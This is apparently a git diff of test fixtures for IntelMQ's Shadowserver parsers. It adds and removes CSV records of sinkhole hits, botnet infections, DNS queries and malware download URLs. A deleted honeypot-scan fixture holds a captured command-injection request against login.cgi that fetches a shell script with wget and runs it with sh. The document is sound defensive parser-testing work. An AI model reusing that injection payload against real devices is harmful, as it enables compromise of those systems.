+"2021-06-07 00:00:01","tcp","174.114.9.10",59000,812,"CA","ONTARIO","OTTAWA",,517311,"Communications, Service Provider, and Hosting Service",,,,"40.121.206.97",80,8075,"US","VIRGINIA","ASHBURN",,334111,"Information","MSDCU","necurs","necurs","necurs",,,,"/locator.php","40.121.206.97",,,,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/event4_sinkhole.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/event4_sinkhole.csv
index 85b69c97d..c5126c843 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/event4_sinkhole.csv
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/event4_sinkhole.csv
@@ -1,7 +1,4 @@
 "timestamp","protocol","src_ip","src_port","src_asn","src_geo","src_region","src_city","src_hostname","src_naics","src_sector","device_vendor","device_type","device_model","dst_ip","dst_port","dst_asn","dst_geo","dst_region","dst_city","dst_hostname","dst_naics","dst_sector","public_source","infection","family","tag","application","version","event_id"
-"2021-03-04 00:00:00","tcp","190.113.1.2",17409,12252,"PE","METROPOLITANA DE LIMA","LIMA",,,,,,,"178.162.1.2",4455,28753,"DE","HESSEN","FRANKFURT AM MAIN",,518210,"Communications, Service Provider, and Hosting Service","eset","victorygate.b",,,,,
-"2021-03-04 00:00:00","tcp","217.173.3.4",28940,8220,"IE","DUBLIN","DUBLIN",,541611,"Communications, Service Provider, and Hosting Service",,,,"137.116.3.4",16464,8075,"SG","CENTRAL","SINGAPORE",,334111,"Information","MSDCU",,,"b68-zeroaccess-2-32bit",,,
-"2021-03-04 00:00:00","tcp","37.212.5.6",36735,6697,"BY","VITEBSKAJA OBLAST'","VITEBSK",,,,,,,"168.63.5.6",16464,8075,"HK","HONG KONG","HONG KONG",,334111,"Information","MSDCU",,,"b68-zeroaccess-2-32bit",,,
-"2021-03-04 00:00:00","tcp","86.130.7.8",50395,2856,"UK","MID ULSTER","DUNGANNON",,517311,"Communications, Service Provider, and Hosting Service",,,,"40.71.228.10",16471,8075,"US","VIRGINIA","ASHBURN",,334111,"Information","MSDCU",,,"b68-zeroaccess-1-32bit",,,
-"2021-03-04 00:00:00","tcp","35.205.9.10",44696,15169,"BE","BRUXELLES-CAPITALE","BRUSSELS","x.x.205.35.bc.googleusercontent.com",519130,"Communications, Service Provider, and Hosting Service",,,,"148.81.9.10",80,1887,"PL","MAZOWIECKIE","WARSAW",,,,,"virut",,,,,
-"2021-03-04 00:00:00","tcp","35.197.11.12",36968,15169,"US","OREGON","THE DALLES","x.x.197.35.bc.googleusercontent.com",519130,"Communications, Service Provider, and Hosting Service",,,,"148.81.111.11.12",80,1887,"PL","MAZOWIECKIE","WARSAW",,,,,"virut",,,,,
+"2021-03-04 00:00:00","tcp","190.113.1.2",17409,12252,"PE","METROPOLITANA DE LIMA","LIMA",,,,,,,"178.162.1.2",4455,28753,"DE","HESSEN","FRANKFURT AM MAIN",,518210,"Communications, Service Provider, and Hosting Service","eset","victorygate.b","victorygate.b",,,,
+"2021-03-04 00:00:00","tcp","35.205.9.10",44696,15169,"BE","BRUXELLES-CAPITALE","BRUSSELS","x.x.205.35.bc.googleusercontent.com",519130,"Communications, Service Provider, and Hosting Service",,,,"148.81.9.10",80,1887,"PL","MAZOWIECKIE","WARSAW",,,,,"virut","virut",,,,
+"2021-03-04 00:00:00","tcp","35.197.11.12",36968,15169,"US","OREGON","THE DALLES","x.x.197.35.bc.googleusercontent.com",519130,"Communications, Service Provider, and Hosting Service",,,,"148.81.111.11.12",80,1887,"PL","MAZOWIECKIE","WARSAW",,,,,"virut","virut",,,,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/event4_sinkhole_dns.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/event4_sinkhole_dns.csv
new file mode 100644
index 000000000..3e85690d8
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/event4_sinkhole_dns.csv
@@ -0,0 +1,4 @@
+"timestamp","protocol","src_ip","src_port","src_asn","src_geo","src_region","src_city","src_hostname","src_naics","src_sector","device_vendor","device_type","device_model","infection","family","tag","query_type","query","count"
+"2022-01-06 00:00:02","udp","217.110.0.0",29614,8220,"DE","HESSEN","FRANKFURT AM MAIN",,518210,"Communications, Service Provider, and Hosting Service",,,,"calypso","calypso","msexchange","A","YolkIsh.COM",1
+"2022-01-06 00:00:02","udp","209.66.0.0",46189,40934,"US","VIRGINIA","ASHBURN",,518210,,,,,"orcus","orcus","rat","A","verble.rocks",1
+"2022-01-06 00:00:02","udp","217.110.0.0",3590,8220,"DE","HESSEN","FRANKFURT AM MAIN",,518210,"Communications, Service Provider, and Hosting Service",,,,"calypso","calypso","msexchange","A","RAwFuNS.COM",1
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/event4_sinkhole_dns.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/event4_sinkhole_dns.csv.license
new file mode 100644
index 000000000..662bb20b7
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/event4_sinkhole_dns.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/event6_sinkhole_http.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/event6_sinkhole_http.csv
new file mode 100644
index 000000000..016d2f912
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/event6_sinkhole_http.csv
@@ -0,0 +1,4 @@
+"timestamp","protocol","src_ip","src_port","src_asn","src_geo","src_region","src_city","src_hostname","src_naics","src_sector","device_vendor","device_type","device_model","dst_ip","dst_port","dst_asn","dst_geo","dst_region","dst_city","dst_hostname","dst_naics","dst_sector","public_source","infection","family","tag","application","version","event_id","http_url","http_host","http_agent","forwarded_by","ssl_cipher","http_referer"
+"2022-03-02 09:14:19","tcp","2001:448a:1082:4d9b:7491:bf9e:3d5f:a634",49431,7713,"ID","JAKARTA RAYA","JAKARTA",,,,,,,"2001:470:1:332::fe",80,6939,"US","CALIFORNIA","FREMONT",,518210,"Communications, Service Provider, and Hosting Service",,"boaxxe","boaxxe","3ve",,,,"GET /QKMSvF2hl11j%2fbMkyPbF5EpHYhd6VWTG4u19K3Rt7JGU3lMYRqpq8wPYEuOGKKeidKW3pefVfKSjBnL0cXizZbmuWWu8AQNRqw5g9Ny5vZtiv638XKoWwCLuUOTISTV%2fLcpcS1%2f22NjWqgXkHGISAuyVtafqyCC%2f5cA0eYg9Me8VzAIFDdTArogQOdYhElf2xluhEFPsstGQ%2bwrM4VmKHJpzyjD7Y%2fN%2bQV3wnZNdVkEVk1k2iKBJkotYv3ajgYWr56xxCbY5vE1IpZBRNhhaUDNZo0kJgi%2b6knXZ4m7JHt%2fGtJeP%2bNTxHSUL2ELlTIiT3ENlPYD6FdH6ZBxT1OneW%2f0ih%2fcN7vctb5B5Qwa1ez7ZjN2QxgBYkFDDHHTs42ej5eF2BysWAQDSUr%2fcySyGxcfPveIpfQEdrynGKR6z3OYqkFnP%2bYRDQp2rt1qt0FwCB4L9cg05TQlSSTJVGfPDrtcqjvKY4c9hWwSHtE8jMRpeCYO4Es%2bWgwr5DjzMicmuZo%2f4Ycr16jpN7xlDJdJ8iCFZxbSGgVC7ksVlGE8wlfWPI4KTuX5U5s61eNWPTlAC%2fOGb8grtw%2ffzizoIX9D6ZUMvslGLQIp%2fvNmNQkZy8HhNoV6Lns%2figITP%2fpN0H8h9HjUTl9qn65xFOEVpc0motSy8alcTPtTRKq5Jvc4Ao0x3N%2fvCB1v4Epx7XC0UpFbw8TrYEvAczEfGsGM HTTP/1.1","devps.net","Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)",,,
+"2022-03-02 09:15:10","tcp","2001:448a:1082:4d9b:7491:bf9e:3d5f:a634",49460,7713,"ID","JAKARTA RAYA","JAKARTA",,,,,,,"2001:470:1:332::ef",80,6939,"US","CALIFORNIA","FREMONT",,518210,"Communications, Service Provider, and Hosting Service",,"boaxxe","boaxxe","3ve",,,,"GET /QKMSvF2hl11j%2fbMkyPbF5EpHYhd6VWTG4u19K3Rt7JGU3lMYRqpq8wPYEuOGKKeidKW3pefVfKSjBnL0cXizZbmuWWu8AQNRqw5g9Ny5vZtiv638XKoWwCLuUOTISTV%2fLcpcS1%2f22NjWqgXkHGISAuyVtafqyCC%2f5cA0eYg9Me8VzAIFDdTArogQOdYhElf2xluhEFPsstGQ%2bwrM4VmKHJpzyjD7Y%2fN%2bQV3wnZNdVkEVk1k2iKBJkotYv3ajgYWr56xxCbY5vE1IpZBRNhhaUDNZo0kJgi%2b6knXZ4m7JHt%2fGtJeP%2bNTxHSUL2ELlTIiT3ENlPYD6FdH6ZBxT1OneW%2f0ih%2fcN7vctb5B5Qwa1ez7ZjN2QxgBYkFDDHHTs42ej5eF2BysWAQDSUr%2fcySyGxcfPveIpfQEdrynGKR6z3OYqkFnP%2bYRDQp2rt1qt0FwCB4L9cg05TQlSSTJVGfPDrtcqjvKY4c9hWwSHtE8jMRpeCYO4Es%2bWgwr5DjzMicmuZo%2f4Ycr16jpN7xlDJdJ8iCFZxbSGgVC7ksVlGE8wlfWPI4KTuX5U5s61eNWPTlAC%2fOGb8grtw%2ffzizoIX9D6ZUMvslGLQIp%2fvNmNQkZy8HhNoV6Lns%2figITP%2fpN0H8h9HjUTl9qn65xFOEVpc0motSy8alcTPtTRKq5Jvc4Ao0x3N%2fvCB1v4Epx7XC0UpFbw8TrYEvAczEfGsGM HTTP/1.1","devps.net","Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)",,,
+"2022-03-02 14:15:10","tcp","2603:8080:b20a:dc00:f06e:8304:71f6:27e2",62932,11427,"US","TEXAS","GARLAND",,517311,"Communications, Service Provider, and Hosting Service",,,,"2001:470:1:332::fe",80,6939,"US","CALIFORNIA","FREMONT",,518210,"Communications, Service Provider, and Hosting Service",,"boaxxe","boaxxe","3ve",,,,"GET /WMoUNCvuKGzdqSCeQcadP1%2f0B%2f3bzpOmyKBU85Z25HVOhvDQUPFl%2fk8uOcLewS%2b1BsuHXalRAOIgGOYYs2igj6UX8FkdCAmDewWPvfDhPD45nwd2tx1lLf2IoIfuOtIpGR6bN5Q6hGpSBgfERqCa0ImHcwfcZ2EdO%2fWvg7R8H6SLcTiuUC0I4pzvlWt1CRLgLdIEU1hZ0nnFHIHhchb6D7ITEgBQ2chQDxy5TJMrGjm4Dac6dKl%2ft5uYhRhSjAHkLLtgrJjsqVtVbelTAkt5kdcqLlO09m1SH%2fvtAb%2fOvR2DbhBss7%2f64DG7g6cAnghNA6JrFn1uW7sw%2bnKH8koKQwzUjdSsbrQAvmg4r0KDDW8Diq64gfDzxFWkzCLOYifc%2fwlinXPCl7aJiNCoieDC1U98RNQg%2f5td4SZmJnDQ2%2f96CPbFeSpCez5WD1rCjrxLj1h2cqzIgkydEWACceWP9ztxc4QaObzEcgOGxbRckWC7H2aaLeT8jaYEYdKi1pwEKChSL3YdEt4ZIb2IFrWwzNaXEpQzFXf07f902OEdI9vVA1ZdEOBPG6rAIkzMdebfprfVyhKEWtrCd3Skg3COUFtRQks5jzG1nv4sVGijTfSgyn6xE9Taka668Nycik6nmHy8Huj3oC01j3tee%2f1Z3eI6tV7lgM5d3uFJ84slRGHUCwMfVozOGmZRwNo%2fz%2bA HTTP/1.1","devps.net","Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",,,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/event6_sinkhole_http.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/event6_sinkhole_http.csv.license
new file mode 100644
index 000000000..662bb20b7
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/event6_sinkhole_http.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/hp_http_scan.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/hp_http_scan.csv
deleted file mode 100644
index 1335e0b56..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/hp_http_scan.csv
+++ /dev/null
@@ -1,3 +0,0 @@
-"timestamp","ip","port","asn","geo","region","city","hostname","type","dst_ip","dst_port","dst_asn","dst_geo","dst_dns","naics","sic","sector","dst_sector","public_source","sensorid","pattern","url","file_md5","file_sha256","request_raw"
-"2018-08-29 00:00:05","198.51.100.5","52513","27668","EC","AZUAY","CUENCA","198-51-100-5.example.net","http-scan","203.0.113.6","80","17169","AT","203-0-113-6.example.net","1","2","IT1","IT2","SISSDEN","53c1549f-f806-4b82-8b3a-6673456cd40f","example-pattern","/","12345","67890","GET / HTTP/1.1"
-"2018-08-29 00:04:08","198.51.100.3","33418","23033","US","WASHINGTON","EVERETT","198-51-100-3.example.net","http-scan","203.0.113.217","80","56630","RU","203-0-113-217.example.net","1","2","Communications","IT","SISSDEN","5800ff5d-277e-48aa-b904-0997a00c6a37","example-pattern","/axis-cgi/aol%2A/_do/rss_popup?blogID=","09876","54321","GET /axis-cgi/aol%2A/_do/rss_popup?blogID= HTTP/1.1"
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/hp_ics_scan.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/hp_ics_scan.csv
deleted file mode 100644
index 1334d233c..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/hp_ics_scan.csv
+++ /dev/null
@@ -1,3 +0,0 @@
-"timestamp","ip","port","asn","geo","region","city","hostname","protocol","type","dst_ip","dst_port","dst_asn","dst_geo","dst_dns","naics","sic","sector","dst_sector","public_source","sensorid","state","slave_id","function_code","request","response"
-"2018-09-16 00:00:54","198.51.100.5",56066,3462,"TW","KEELUNG CITY","KEELUNG","5.dynamic-ip.example.net","http","ics-scan","203.0.113.10",80,39324,"FI","203-0-113-10.example.net",518210,737415,"Communications","IT","SISSDEN","000a14be-2fd9-408f-a855-fd7f984f6bca","new_connection","aa-bb-cc",1,"('/login.cgi?cli=aa%20aa%27;wget%20http://192.0.2.15/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$')",404
-"2018-09-16 23:51:13","198.51.200.50",60565,26599,"BR","SAO PAULO","ITAPEVI","198-51-200-50.example.net","http","ics-scan","203.0.113.105",80,15626,"UA","203-0-113-105.example.net",1,2,"Communications","IT","SISSDEN","c010c930-fdbc-458c-b82d-d872d3ef206d","new_connection","11-22-33",2,"('/')",302
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/malware_url.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/malware_url.csv
new file mode 100644
index 000000000..ccafbab3f
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/malware_url.csv
@@ -0,0 +1,4 @@
+"timestamp","url","host","ip","asn","geo","region","city","naics","sector","tag","source","sha256","application"
+"2022-01-07 00:02:07","http://41.86.0.0:50008/Mozi.m","41.86.0.0","41.86.0.0",37203,"LR","MONTSERRADO","MONROVIA",,,"CVE-2016-10372",,"12013662c71da69de977c04cd7021f13a70cf7bed4ca6c82acbc100464d4b0ef","http"
+"2022-01-07 00:03:14","http://42.225.0.0:38173/Mozi.m","42.225.0.0","42.225.0.0",4837,"CN","HENAN SHENG","ZHUMADIAN",517311,,"CVE-2018-10562",,,"http"
+"2022-01-07 00:10:26","http://211.52.0.0:53029/Mozi.m","211.52.0.0","211.52.0.0",4766,"KR","CHUNGCHEONGNAM-DO","SAGOK-MYEON",517311,,"CVE-2018-10562",,,"http"
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/malware_url.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/malware_url.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/malware_url.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/microsoft_sinkhole.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/microsoft_sinkhole.csv
deleted file mode 100644
index 496cab93d..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/microsoft_sinkhole.csv
+++ /dev/null
@@ -1,108 +0,0 @@
-"timestamp","ip","asn","geo","url","type","http_agent","tor","src_port","p0f_genre","p0f_detail","hostname","dst_port","http_host","http_referer","http_referer_ip","http_referer_asn","http_referer_geo","dst_ip","dst_asn","dst_geo","naics","sic","http_referer_naics","http_referer_sic","sector","ssl_cipher","application","version"
-"2014-09-12 00:00:00","77.12.73.138",6805,"DE",,"b68-zeroaccess-1-64bit",,,64742,,,,16470,,,,,,"168.63.184.224",8075,"SG",0,0,,,,,
-"2014-09-12 00:00:00","109.64.133.187",8551,"IL",,"b68-zeroaccess-1-64bit",,,62473,,,,16470,,,,,,"168.63.202.23",8075,"HK",0,0,,,,,
-"2014-09-12 00:00:00","187.24.22.90",22085,"BR",,"b68-zeroaccess-1-32bit",,,1030,,,,16471,,,,,,"82.192.70.219",16265,"NL",0,0,,,,,
-"2014-09-12 00:00:00","118.158.226.105",2516,"JP",,"b68-zeroaccess-1-64bit",,,49152,,,,16470,,,,,,"168.63.184.224",8075,"SG",0,0,,,,,
-"2014-09-12 00:00:00","173.196.9.222",20001,"US",,"b68-zeroaccess-2-32bit",,,55253,,,,16464,,,,,,"207.46.138.117",8075,"HK",0,0,,,,,
-"2014-09-12 00:00:00","42.112.141.154",18403,"VN",,"b68-zeroaccess-2-32bit",,,29554,,,,16464,,,,,,"168.63.240.164",8075,"SG",0,0,,,,,
-"2014-09-12 00:00:00","12.179.112.155",7018,"US","/index.php","caphaw","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.8077)",,57067,,,,443,"204.95.99.205",0,,,,"204.95.99.205",8075,"US",0,0,,,,,
-"2014-09-12 00:00:00","70.60.43.102",10796,"US","/ping.html","caphaw","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.7357)",,2266,,,,443,"xf5wau9lcpf5.oonucoog.cc",0,,,,"204.95.99.204",8075,"US",0,0,,,,,
-"2014-09-12 00:00:00","189.108.25.26",10429,"BR","/index.php","caphaw","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.9121)",,50634,,,,443,"3k3kwrnj.rgk.cc",0,,,,"204.95.99.204",8075,"US",0,0,,,,,
-"2014-09-12 00:00:01","66.245.69.124",6983,"US","/wild/live/file.php","citadel-b54","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; BRI/1)",,3130,,,,80,"ultimaresource.com",0,,,,"199.2.137.201",3598,"US",0,0,,,,,
-"2014-09-12 00:00:01","50.52.19.180",5650,"US","/file-b29d40.php","citadel-b54","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; .NET CLR 3.5.21022)",,52176,,,,80,"199.2.137.202",0,,,,"199.2.137.202",3598,"US",0,0,,,,,
-"2014-09-12 00:00:01","99.243.32.48",812,"CA","/367601b6737825deb58a244576e4f098/file.php","citadel-b54","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; AskTB5.6)",,49725,,,,80,"prohomemain.com",0,,,,"199.2.137.201",3598,"US",0,0,,,,,
-"2014-09-12 00:00:01","106.156.210.197",2516,"JP","/view/file.php","citadel-b54","Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; AskTbFWV5/5.11.3.15590)",,55400,,,,80,"ronapri.com",0,,,,"199.2.137.202",3598,"US",0,0,,,,,
-"2014-09-12 00:00:01","138.217.89.25",1221,"AU","/message.php","bamital-b58","Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; .NET4.0C)",,62254,,,,80,"9A5BB34EEDE4B85B9E81F40D530B68FF.co.cc",0,,,,"199.2.137.201",3598,"US",0,0,,,,,
-"2016-08-30 00:00:00","198.51.100.4",29562,"DE",,"b68-zeroaccess-1-64bit",,,49155,,,,16470,,,,,,"198.51.100.182",8075,"HK",0,0,,,,,,
-"2016-08-30 00:00:00","198.51.100.176",3209,"DE",,"b68-zeroaccess-2-32bit",,,1096,,,,16464,,,,,,"198.51.100.221",8075,"SG",0,0,,,,,,
-"2016-08-30 00:00:01","198.51.100.176",3209,"DE",,"b68-zeroaccess-2-32bit",,,51236,,,,16464,,,,,,"198.51.100.174",8075,"HK",0,0,,,,,,
-"2016-08-30 00:00:04","198.51.100.167",3320,"DE",,"b68-zeroaccess-1-64bit",,,26123,,,,16470,,,,,,"198.51.100.60",8075,"US",541690,874899,,,,,,
-"2016-08-30 00:00:05","198.51.100.7",9145,"DE",,"b68-zeroaccess-1-32bit",,,65354,,,,16471,,,,,,"198.51.100.24",8075,"US",0,0,,,,,,
-"2016-08-30 00:00:07","198.51.100.86",3320,"DE",,"b68-zeroaccess-2-32bit",,,1025,,,,16464,,,,,,"198.51.100.231",8075,"US",0,0,,,,,,
-"2016-08-30 00:00:08","198.51.100.197",3320,"DE",,"b68-zeroaccess-2-32bit",,,1052,,,,16464,,,,,,"198.51.100.87",8075,"SG",541690,874899,,,,,,
-"2016-08-30 00:00:08","198.51.100.6",3320,"DE",,"b68-zeroaccess-1-32bit",,,1034,,,,16471,,,,,,"198.51.100.193",60781,"NL",541690,874899,,,,,,
-"2016-08-30 00:00:09","198.51.100.63",8881,"DE",,"b68-zeroaccess-2-32bit",,,49164,,,,16464,,,,,,"198.51.100.179",8075,"US",0,0,,,,,,
-"2016-08-30 00:00:09","198.51.100.112",3320,"DE",,"b68-zeroaccess-2-32bit",,,1027,,,,16464,,,,,,"198.51.100.189",8075,"IE",541690,874899,,,,,,
-"2016-08-30 00:00:10","198.51.100.44",3320,"DE",,"b68-zeroaccess-2-32bit",,,1039,,,,16464,,,,,,"198.51.100.215",8075,"US",541690,874899,,,,,,
-"2016-08-30 00:00:10","198.51.100.231",3320,"DE",,"b68-zeroaccess-2-32bit",,,59841,,,,16464,,,,,,"198.51.100.234",8075,"IE",541690,874899,,,,,,
-"2016-08-30 00:00:11","198.51.100.165",8881,"DE",,"b68-zeroaccess-2-32bit",,,2737,,,,16464,,,,,,"198.51.100.170",8075,"SG",0,0,,,,,,
-"2016-08-30 00:00:14","198.51.100.66",12440,"DE",,"b68-zeroaccess-2-32bit",,,61570,,,,16464,,,,,,"198.51.100.150",8075,"US",0,0,,,,,,
-"2016-08-30 00:00:14","198.51.100.222",20880,"DE",,"b68-zeroaccess-2-32bit",,,1025,,,,16464,,,,,,"198.51.100.19",8075,"US",0,0,,,,,,
-"2016-08-30 00:00:15","198.51.100.83",6805,"DE",,"b68-zeroaccess-1-64bit-supernode",,,16470,,,,16470,,,,,,"198.51.100.61",8075,"SG",0,0,,,,,,
-"2016-08-30 00:00:16","198.51.100.94",6805,"DE",,"b68-zeroaccess-1-64bit-supernode",,,16470,,,,16470,,,,,,"198.51.100.242",8075,"US",0,0,,,,,,
-"2016-08-30 00:00:16","198.51.100.251",6805,"DE",,"b68-zeroaccess-2-32bit",,,1028,,,,16464,,,,,,"198.51.100.41",60781,"NL",0,0,,,,,,
-"2016-08-30 00:00:16","198.51.100.160",3320,"DE",,"b68-zeroaccess-2-32bit",,,1025,,,,16464,,,,,,"198.51.100.243",60781,"NL",541690,874899,,,,,,
-"2016-08-30 00:00:17","198.51.100.190",42965,"DE",,"b68-zeroaccess-2-32bit",,,52777,,,,16464,,,,,,"198.51.100.29",8075,"IE",0,0,,,,,,
-"2016-08-30 00:00:18","198.51.100.224",3320,"DE",,"b68-zeroaccess-1-32bit",,,1026,,,,16471,,,,,,"198.51.100.143",8075,"HK",541690,874899,,,,,,
-"2016-08-30 00:00:21","198.51.100.120",6805,"DE",,"b68-zeroaccess-1-32bit",,,55515,,,,16471,,,,,,"198.51.100.196",60781,"NL",0,0,,,,,,
-"2016-08-30 00:00:21","198.51.100.123",3209,"DE",,"b68-zeroaccess-2-32bit",,,1272,,,,16464,,,,,,"198.51.100.122",8075,"HK",518210,737415,,,,,,
-"2016-08-30 00:00:24","198.51.100.192",3320,"DE",,"b68-zeroaccess-1-64bit",,,52022,,,,16470,,,,,,"198.51.100.146",60781,"NL",541690,874899,,,,,,
-"2016-08-30 00:00:26","198.51.100.127",3209,"DE",,"b68-zeroaccess-2-32bit-supernode",,,16464,,,,16464,,,,,,"198.51.100.112",60781,"NL",0,0,,,,,,
-"2016-08-30 00:00:26","198.51.100.45",9145,"DE",,"b68-zeroaccess-2-32bit",,,1029,,,,16464,,,,,,"198.51.100.46",8075,"HK",0,0,,,,,,
-"2016-08-30 00:00:27","198.51.100.202",31334,"DE",,"b68-zeroaccess-2-32bit",,,34290,,,,16464,,,,,,"198.51.100.6",60781,"NL",0,0,,,,,,
-"2016-08-30 00:00:29","198.51.100.34",8881,"DE",,"b68-zeroaccess-2-32bit",,,1175,,,,16464,,,,,,"198.51.100.210",8075,"US",0,0,,,,,,
-"2016-08-30 00:00:29","198.51.100.97",39706,"DE",,"b68-zeroaccess-2-32bit",,,56324,,,,16464,,,,,,"198.51.100.172",8075,"HK",0,0,,,,,,
-"2016-08-30 00:00:30","198.51.100.20",3320,"DE",,"b68-zeroaccess-2-32bit",,,1090,,,,16464,,,,,,"198.51.100.181",60781,"NL",541690,874899,,,,,,
-"2016-08-30 00:00:31","198.51.100.244",31334,"DE",,"b68-zeroaccess-2-32bit",,,1039,,,,16464,,,,,,"198.51.100.85",8075,"US",0,0,,,,,,
-"2016-08-30 00:00:33","198.51.100.150",3320,"DE","/index.php","caphaw","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.7032)",,37584,,,,443,"198-51-100-150.example.net","null",,,,"198.51.100.154",8075,"US",518210,737415,,,,,,
-"2016-08-30 00:00:34","198.51.100.83",31334,"DE",,"b68-zeroaccess-2-32bit-supernode",,,16464,,,,16464,,,,,,"198.51.100.6",8075,"SG",0,0,,,,,,
-"2016-08-30 00:00:34","198.51.100.228",3320,"DE",,"b68-zeroaccess-2-64bit",,,55247,,,,16465,,,,,,"198.51.100.150",8075,"US",541690,874899,,,,,,
-"2016-08-30 00:00:36","198.51.100.71",3209,"DE",,"b68-zeroaccess-2-32bit",,,1567,,,,16464,,,,,,"198.51.100.239",8075,"US",0,0,,,,,,
-"2016-08-30 00:00:40","198.51.100.46",3209,"DE",,"b68-zeroaccess-2-32bit",,,1035,,,,16464,,,,,,"198.51.100.53",8075,"US",0,0,,,,,,
-"2016-08-30 00:00:47","198.51.100.78",3320,"DE",,"b68-zeroaccess-2-32bit",,,1027,,,,16464,,,,,,"198.51.100.164",8075,"US",541690,874899,,,,,,
-"2016-08-30 00:00:48","198.51.100.142",6830,"DE",,"b68-zeroaccess-1-64bit",,,59068,,,,16470,,,,,,"198.51.100.85",8075,"US",0,0,,,,,,
-"2016-08-30 00:00:50","198.51.100.173",3320,"DE",,"b68-zeroaccess-2-32bit",,,1063,,,,16464,,,,,,"198.51.100.180",8075,"HK",518210,737415,,,,,,
-"2016-08-30 00:00:52","198.51.100.119",3320,"DE",,"b68-zeroaccess-1-32bit",,,1026,,,,16471,,,,,,"198.51.100.183",8075,"US",541690,874899,,,,,,
-"2016-08-30 00:00:52","198.51.100.108",3320,"DE",,"b68-zeroaccess-2-32bit",,,63140,,,,16464,,,,,,"198.51.100.221",8075,"IE",541690,874899,,,,,,
-"2016-08-30 00:00:59","198.51.100.156",12638,"DE",,"b68-zeroaccess-2-32bit",,,1025,,,,16464,,,,,,"198.51.100.200",8075,"US",0,0,,,,,,
-"2016-08-30 00:01:02","198.51.100.162",3320,"DE",,"b68-zeroaccess-2-64bit",,,62534,,,,16465,,,,,,"198.51.100.140",8075,"SG",541690,874899,,,,,,
-"2016-08-30 00:01:02","198.51.100.121",3320,"DE",,"b68-zeroaccess-2-32bit",,,1032,,,,16464,,,,,,"198.51.100.33",8075,"US",541690,874899,,,,,,
-"2016-08-30 00:01:04","198.51.100.203",3320,"DE",,"b68-zeroaccess-2-64bit",,,60478,,,,16465,,,,,,"198.51.100.16",8075,"US",541690,874899,,,,,,
-"2016-08-30 00:01:05","198.51.100.166",3209,"DE",,"b68-zeroaccess-2-32bit",,,1052,,,,16464,,,,,,"198.51.100.135",8075,"US",518210,737415,,,,,,
-"2016-08-30 00:01:12","198.51.100.154",3209,"DE",,"b68-zeroaccess-1-32bit",,,57035,,,,16471,,,,,,"198.51.100.237",8075,"US",0,0,,,,,,
-"2016-08-30 00:01:13","198.51.100.45",6805,"DE",,"b68-zeroaccess-1-64bit",,,56117,,,,16470,,,,,,"198.51.100.140",60781,"NL",0,0,,,,,,
-"2016-08-30 00:01:14","198.51.100.128",3320,"DE",,"b68-zeroaccess-1-32bit",,,49152,,,,16471,,,,,,"198.51.100.125",8075,"SG",541690,874899,,,,,,
-"2016-08-30 00:01:15","198.51.100.167",8881,"DE",,"b68-zeroaccess-2-32bit",,,49986,,,,16464,,,,,,"198.51.100.73",8075,"HK",0,0,,,,,,
-"2016-08-30 00:01:16","198.51.100.63",3209,"DE",,"b68-zeroaccess-2-32bit",,,1076,,,,16464,,,,,,"198.51.100.253",8075,"SG",0,0,,,,,,
